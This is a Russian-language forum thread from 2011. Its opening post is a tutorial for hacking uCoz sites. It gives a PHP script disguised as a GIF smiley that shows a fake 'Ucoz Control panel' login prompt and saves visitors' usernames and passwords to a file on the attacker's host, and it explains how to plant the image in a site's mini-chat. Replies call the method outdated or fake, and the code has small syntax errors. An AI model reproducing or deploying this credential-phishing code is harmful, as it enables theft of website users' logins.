• Страница 1 из 1
  • 1
Форум O-CSS.RU » Ucoz раздел » Полезные статьи » Один из вариантов взлома сайта на платформе юкоза
Один из вариантов взлома сайта на платформе юкоза
LonSДата: Понедельник, 03.01.2011, 13:35 | Сообщение # 1
Логин: LonS
Имя: СаШкА
Сообщений: 585
Награды: 6
Репутация: 546
Замечания:
Привет. Сегодня я расскажу один из способов взлома сайтов на юкозе. Настоящий хакер может найти достаточно много уязвимостей на таких сайтах и знает много способов их взлома. Я надеюсь что скоро тоже буду таким. Итак, начнем... Для начала нажно зарегистировать хост с поддержкой php (например http://mysite.phphost.net ) . После регистрации льем на фтп скрипт и ставим права на пустой .txt файл, например : passwords.txt (сюда будут присылаться пассы пользователей похаканного сайта), и на файл smile.gif. Также скачайте любой смайлик в расширении .gif (типа cool.gif). Затем откройте блокнот, да простой блокнот и напишите следующее:
header("Content-type: image/gif";
$image = imagecreatefromgif('cool.gif');
if(!$_COOKIE['LOGON'])
{
$login = $_SERVER['PHP_AUTH_USER'];
$pass = $_SERVER['PHP_AUTH_PW'];
if(strlen($pass) <= 4 || !$login)
{
Header('HTTP/1.1 401 Unauthorized');
Header('WWW-Authenticate: Basic realm="Ucoz Control panel"');
}
elseif($login)
{
setcookie('LOGON',md5($pass));
$f = fopen('passwords.txt', 'ab');
fwrite($f, $login." ||| ".$pass."\r\n";
fclose($f);
}
}
imagegif($image);
imagedestroy($image);
?>

Как только вы напишите всё - сохраните файл под названием smile, потом поменяйте расширение на gif. Теперь выбирайте любой юкозовский сайт, например http:/что-то.ucoz.ru/ слева юкозовских сайтов как обычно, у большинства есть мини-чат справа. Так вот - для начала зарегистируйтесь на сайте, потом в мини чате напишите логин, а в содержании сообщения напишите следующее:

И нажмите ОК. Если после этого в миничате вместо сообщения появился смайлик - значит радуйтесь, т.к. сайт - уязвимый. После этого у всех кто будет заходить на данную страницу, (в этом примере это http://что-то.ucoz.ru/ ) будет появляться форма в которую нужно будет ввести логин и пароль. У вас при входе на сайт такая форма будет появляться тоже. И все, введенные логины и пароли в эту форму будут отсылаться в пустой файл passwords.txt, который вы создали в самом начале и залили на фтп. Удачи! Практикуйтесь. Только на некоторых сайтах эта уязвимость может и не пройти. Но стандрартно созданный юкозовский сайт без доп. своих настроек будет уязвим. Всем спасибо за просмотр, надеюсь статья вам поможет


z1MДата: Суббота, 08.01.2011, 22:10 | Сообщение # 2
Администратор.
Логин: z1M
Имя: Даниил
Сообщений: 1488
Награды: 5
Репутация: 137
Замечания:
Уже не рабочий способ.

Мой сайт Gaming-up
Cresp1ksДата: Суббота, 08.01.2011, 23:07 | Сообщение # 3
Логин: Cresp1ks
Имя: Никита
Сообщений: 432
Награды: 2
Репутация: 40
Замечания:
да старенький уже.... biggrin

belyuДата: Суббота, 08.01.2011, 23:18 | Сообщение # 4
Seller
Логин: belyu
Имя: Ruslan
Сообщений: 180
Награды: 1
Репутация: -3
Замечания:
ненавижу фейки=)

Форум O-CSS.RU » Ucoz раздел » Полезные статьи » Один из вариантов взлома сайта на платформе юкоза
  • Страница 1 из 1
  • 1
Поиск:

Статистика Форума
Лучшие пользователи
Уважаемые пользователи
Популярные темы
Недавно обновленные темы
LaiNeR Постов [ 3127 ]
Staistesap Постов [ 1545 ]
z1M Постов [ 1488 ]
Mooxyrep Постов [ 1145 ]
Pooniacact Постов [ 986 ]
KoreshoK Постов [ 644 ]
LonS Постов [ 585 ]
BIG_BOSS Постов [ 572 ]
DoZa Постов [ 564 ]
shooter Постов [ 468 ]
LonS Репутация [ 546 ]
LaiNeR Репутация [ 519 ]
Smofee Репутация [ 477 ]
СнAйПер Репутация [ 436 ]
MedeX Репутация [ 412 ]
TiPSy Репутация [ 300 ]
bleff Репутация [ 279 ]
-=SToRM=- Репутация [ 235 ]
A6c3Ht^ Репутация [ 225 ]
NoRD Репутация [ 210 ]
Общение [ 1309 ]
Считаем до 1 000 [ 664 ]
Поговорим обо всем :) (девушки, машины, личная жизнь и тд) [ 369 ]
Афоризмы (Не комментируйте) [ 301 ]
Играем в СЛОВА [ 187 ]
Конкурс "Угадай возраст". [ 183 ]
Конкурс "Угадай автомобиль" [ 110 ]
Предложения по сайту [ 97 ]
Набивка постов [ 80 ]
Обломай товарища [ 75 ]
source-boost.ru | Мониторинг сервера CSS v34 [ 0 ]
source-boost.ru | Мониторинг сервера CSS v34 [ 0 ]
Скачать CSS v34 НОВЫЕ ПУШКИ - cs-kontra.ru [ 0 ]
Скачать CSS v34 НОВЫЕ ПУШКИ - cs-kontra.ru [ 0 ]
Скачать CSS v34 НОВЫЕ ПУШКИ - cs-kontra.ru [ 0 ]
Скачать CSS v34 НОВЫЕ ПУШКИ - cs-kontra.ru [ 0 ]
Скачать CSS v34 НОВЫЕ ПУШКИ - cs-kontra.ru [ 0 ]
Скачать CSS v34 НОВЫЕ ПУШКИ - cs-kontra.ru [ 0 ]
Скачать CSS v34 НОВЫЕ ПУШКИ - cs-kontra.ru [ 0 ]
Swatik [ 1 ]

Хостинг от uCoz | sitemap.xml | sitemap-forum.xml | sitemap-shop.xml | urllist.txt | |
PR-CY.ru